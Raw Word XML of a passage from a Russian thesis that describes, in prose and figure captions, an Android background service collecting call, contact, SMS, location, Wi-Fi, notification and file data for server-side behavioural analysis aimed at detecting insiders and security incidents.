    <w:p w:rsidR="008B2148" w:rsidRDefault="008B2148" w:rsidP="00375C80">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc61505545"/>
      <w:r>
        <w:t>Общая схема работы системы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="008B2148" w:rsidRDefault="001E572E" w:rsidP="008B2148">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Целью работы является сбор данных с мобильных устройств для </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">проведения поведенческого анализа. По этой причине, ввиду особенности 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Передача данных с конечного мобильного устройства на сервер обработки;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E572E" w:rsidRDefault="001E572E" w:rsidP="00D600A4">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>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P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1E572E" w:rsidRDefault="001E572E" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc61505546"/>
      <w:r>
        <w:t>Возобновляемый фоновый процесс</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>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lastRenderedPageBreak/>
        <w:t>генерирующий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для ОС старше версии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.0 постоянное уведомление о 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18232B" w:rsidRDefault="0018232B" w:rsidP="0018232B">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54048E" w:rsidRDefault="0054048E" w:rsidP="0054048E">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Исходный код возобновляемого сервиса представлен в приложении А.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001773B0" w:rsidRDefault="007637B5" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc61505547"/>
      <w:r>
        <w:t>Запуск модулей сбора данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="0018232B" w:rsidRDefault="0018232B" w:rsidP="007637B5">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Для работы модулей сбора данных приложению необходимо доверенные разрешения к определенным физическим устройствам или системным сервисам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018232B" w:rsidRPr="0054048E" w:rsidRDefault="0018232B" w:rsidP="0018232B">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>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r w:rsidR="0054048E">
        <w:t xml:space="preserve"> Содержимое файла </w:t>
      </w:r>
      <w:r w:rsidR="0054048E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AndroidManifest</w:t>
      </w:r>
      <w:r w:rsidR="0054048E" w:rsidRPr="00355B45">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0054048E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidR="0054048E">
        <w:t xml:space="preserve"> представлено в приложении Б.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37007" w:rsidRDefault="007637B5" w:rsidP="00E37904">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F36882" w:rsidRDefault="0054048E" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Исходный код модуля сбор данных представлен в приложении В.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36882" w:rsidRDefault="00F36882" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc61505548"/>
      <w:r>
        <w:t>Основные модули сбора данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="00A559AC" w:rsidRPr="00713EA3" w:rsidRDefault="00A559AC" w:rsidP="00A559AC">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Большая часть разработанных модулей работает по схоже принципу, однако для коррек</w:t>
      </w:r>
      <w:r w:rsidR="00B66597">
        <w:t>тной работы некоторых требуется иной подход.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37007" w:rsidRDefault="00F37007" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc61505549"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Модуль приложений</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="00766209" w:rsidRDefault="0018232B" w:rsidP="007637B5">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>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6657C4" w:rsidRDefault="006657C4" w:rsidP="007637B5">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Исходный код модуля приложений представлен в приложении Г.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37007" w:rsidRDefault="00F37007" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc61505550"/>
      <w:r>
        <w:t>Модуль вызовов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w:rsidR="00C17BE1" w:rsidRDefault="00C17BE1" w:rsidP="007637B5">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>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t>тип звонка (исходящий, входящий, отклоненный и тп).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C17BE1" w:rsidRDefault="00C17BE1" w:rsidP="00C17BE1">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6657C4" w:rsidRDefault="006657C4" w:rsidP="006657C4">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Исходный код модуля вызовов представлен в приложении Д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37007" w:rsidRDefault="00F37007" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc61505551"/>
      <w:r>
        <w:t>Модуль контактов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="00C17BE1" w:rsidRDefault="00C17BE1" w:rsidP="00C17BE1">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Модуль контактов</w:t>
      </w:r>
      <w:r w:rsidR="00961B7B">
        <w:t xml:space="preserve"> обращается к</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00961B7B">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidR="00961B7B">
        <w:lastRenderedPageBreak/>
        <w:t>инсайдера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0054048E" w:rsidRDefault="0054048E" w:rsidP="00C17BE1">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Исходный код модуля контактов п</w:t>
      </w:r>
      <w:r w:rsidR="006657C4">
        <w:t>редставлен в приложении Е</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37007" w:rsidRDefault="00F37007" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc61505552"/>
      <w:r>
        <w:t>Модуль геолокации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="00766209" w:rsidRDefault="00766209" w:rsidP="007637B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6657C4" w:rsidRDefault="006657C4" w:rsidP="006657C4">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Исходный код модуля геолокации представлен в приложении Ж.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37007" w:rsidRDefault="00F37007" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc61505553"/>
      <w:r>
        <w:t xml:space="preserve">Модуль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="00751156" w:rsidRDefault="00751156" w:rsidP="007637B5">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>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возможного инсайдера или возможных действий социальной инженерии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006657C4" w:rsidRPr="006657C4" w:rsidRDefault="006657C4" w:rsidP="007637B5">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Исходный код модуля </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMS</w:t>
      </w:r>
      <w:r w:rsidRPr="006657C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>представлен в приложении И.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37007" w:rsidRDefault="00F37007" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc61505554"/>
      <w:r>
        <w:t xml:space="preserve">Модуль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="006657C4" w:rsidRDefault="00751156" w:rsidP="006657C4">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r w:rsidR="006657C4" w:rsidRPr="006657C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751156" w:rsidRDefault="006657C4" w:rsidP="006657C4">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Исходный код модуля </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="006657C4">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="006657C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>представлен в приложении К.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37007" w:rsidRPr="00751156" w:rsidRDefault="00F37007" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc61505555"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Модуль уведомлений</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="006B6728" w:rsidRDefault="006B6728" w:rsidP="006B6728">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>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6657C4" w:rsidRDefault="006657C4" w:rsidP="006B6728">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Исходный код модуля уведомлений представлен в приложении Л.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37007" w:rsidRPr="00751156" w:rsidRDefault="00F37007" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc61505556"/>
      <w:r>
        <w:t>Модуль разрешений</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w:rsidR="00F622DF" w:rsidRDefault="006B6728" w:rsidP="006B6728">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B03B72" w:rsidRDefault="00B03B72" w:rsidP="006B6728">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Исходный код модуля разрешений представлен в приложении М.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37007" w:rsidRDefault="00F37007" w:rsidP="00F36882">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc61505557"/>
      <w:r>
        <w:t>Модуль файлов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>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F37007" w:rsidRDefault="00E37904" w:rsidP="00F37007">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Статистика изменения размера каждого файла позволит проанализировать и обнаружить возможное нарушение ИБ. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B03B72" w:rsidRDefault="00B03B72" w:rsidP="00F37007">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Исходный код модуля файлов представлен в приложении Н.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B03B72" w:rsidRDefault="00B03B72" w:rsidP="00497D3B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc61505558"/>
      <w:r>
        <w:t>Модуль логирования</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="00B03B72" w:rsidRDefault="00B03B72" w:rsidP="00B03B72">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Помимо прочего, каждый реализованный модуль обращается к модулю логирования, сохраняющий историю процесса работы приложения для возможности быстрого устранения неполадок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B03B72" w:rsidRPr="00B03B72" w:rsidRDefault="00B03B72" w:rsidP="00B03B72">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Исходный код модуля логирования представлен в приложении П</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F622DF" w:rsidRDefault="00F622DF" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc61505559"/>
      <w:r>
        <w:t>Передача данных на сервер</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00F622DF" w:rsidRDefault="00F622DF" w:rsidP="00F622DF">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Для целостности собираемых данных при работе каждого из модулей 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F622DF" w:rsidRDefault="00F622DF" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc61505560"/>
      <w:r>
        <w:t>Обработка полученных данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>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521070" w:rsidRDefault="00521070" w:rsidP="00F622DF">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Выбранный стек технологий позволяет без труда внедрить данную систему в инфраструктуру с уже имеющейся базой данных, для чего необходимо изменить тип проводника данных в серверном приложении на необходимый.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B374C3" w:rsidRDefault="00B374C3" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc61505561"/>
      <w:r>
        <w:t>Передача данных на клиентское приложение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>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5B4796" w:rsidRPr="005B4796" w:rsidRDefault="005B4796" w:rsidP="00B374C3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Клиентское приложение построено по принципу отрисовки со стороны сервера. Данный подход позволяет изменять содержимое отображаемой </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>страницы без необходимости ее перезагрузки и позволяет избежать высоких затрат ресурсов устройства на отрисовку сайта со стороны пользователя</w:t>
      </w:r>
      <w:r w:rsidR="00D21884">
        <w:t>, что является важным, а иногда критическим фактором для комфортного взаимодействия пользователя с веб-приложениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D778B" w:rsidRDefault="008D778B" w:rsidP="00B374C3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>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8D778B" w:rsidRDefault="008D778B" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc61505562"/>
      <w:r>
        <w:t>Использование системы поведенческого анализа мобильных устройств</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>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C07405">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Общий алгоритм работы системы, запускаемый каждую</w:t>
      </w:r>
      <w:r w:rsidR="00C07405">
        <w:t xml:space="preserve"> минуту, представлен на рисунке</w:t>
      </w:r>
      <w:r w:rsidR="00064AB5">
        <w:t xml:space="preserve"> 8</w:t>
      </w:r>
      <w:r w:rsidR="00531F4B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A97EB2" w:rsidRDefault="00135EB8" w:rsidP="00A97EB2">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00135EB8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841548" cy="3409950"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="28" name="Рисунок 28"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dmo\Documents\Work\repos\Diploma\docs\Архитектура.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7249" cy="3413278"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A97EB2" w:rsidRDefault="00A97EB2" w:rsidP="00C07405">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Общий алгоритм работы системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD4FDA" w:rsidRDefault="00DD4FDA" w:rsidP="00DD4FDA">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Как было отмечены выше и отражено на схеме алгоритма, модуль уведомлений работает по отличному </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>от всех остальных принципу</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, что позволяет собирать информацию о всех пришедших уведомлениях без привязки к перезапуску процесса сбора информации. Так как в момент процесса сбора данных уведомления могут уже быть удалены пользователем или системой, именно такой подход позволит обеспечивать корректную работу данного модуля.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E37904" w:rsidRDefault="00E37904" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc61505563"/>
      <w:r>
        <w:t>Примеры работы сервиса поведенческого анализа МПУ на ОС андроид</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>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необходимости ручного запуска сервиса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D20757" w:rsidRDefault="00D20757" w:rsidP="00E37904">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Но для информирования пользователя об активной работоспособности сервиса, данное приложение создает постоянное уведомление о состоянии сервиса, пример представлен на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00064AB5">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D20757" w:rsidRDefault="00D20757" w:rsidP="00D20757">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00D20757">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>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Default="00D20757" w:rsidP="00C07405">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D20757">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>Пример постоянного о работоспособности сервиса поведенческого анализа МПУ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00505B5C" w:rsidRDefault="00D20757" w:rsidP="00505B5C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Помимо этого, процесс работы сопровождается сообщениями от каждого работающего модуля, пр</w:t>
      </w:r>
      <w:r w:rsidR="00505B5C">
        <w:t>имер сообщения о работе сервиса, пример такого сообщения от модуля контакто</w:t>
      </w:r>
      <w:r w:rsidR="00064AB5">
        <w:t>в продемонстрирован на рисунке 10</w:t>
      </w:r>
      <w:r w:rsidR="00505B5C">
        <w:t>, от модуля г</w:t>
      </w:r>
      <w:r w:rsidR="00064AB5">
        <w:t>еолокации показано на рисунке 11</w:t>
      </w:r>
      <w:r w:rsidR="00505B5C">
        <w:t xml:space="preserve">, а от модуля </w:t>
      </w:r>
      <w:r w:rsidR="00505B5C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidR="00505B5C" w:rsidRPr="00505B5C">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00505B5C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidR="00505B5C" w:rsidRPr="00505B5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00505B5C">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00505B5C" w:rsidRPr="00505B5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00064AB5">
        <w:t>на рисунке 12</w:t>
      </w:r>
      <w:r w:rsidR="00505B5C">
        <w:t>.</w:t>
      </w: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C07405">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Сообщение от модуля контактов</w:t>
      </w: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C07405">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Сообщение от модуля геолокации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00505B5C" w:rsidRDefault="00505B5C" w:rsidP="00505B5C">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00505B5C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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C07405">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Сообщение от модуля </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="00505B5C">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB3021" w:rsidRDefault="00FB3021" w:rsidP="00505B5C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Все сообщения стандартизированы для четкого понимания о работе какого модуля пришло сообщение.</w:t>
      </w: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w:t>
      </w:r>
      <w:r w:rsidR="00064AB5">
        <w:t xml:space="preserve"> продемонстрирован на рисунке 13</w:t>
      </w:r>
      <w:r w:rsidR="00230CD6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230CD6" w:rsidRDefault="00230CD6" w:rsidP="00505B5C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pP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r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Интерфейс приложения поведенческого анлиза МПУ для андроид</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230CD6" w:rsidRDefault="00230CD6" w:rsidP="00505B5C">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116DFC" w:rsidP="00505B5C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>На рисунке 1</w:t>
      </w:r>
      <w:r w:rsidR="00064AB5">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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lastRenderedPageBreak/>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Default="00116DFC" w:rsidP="00C07405">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00116DFC">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
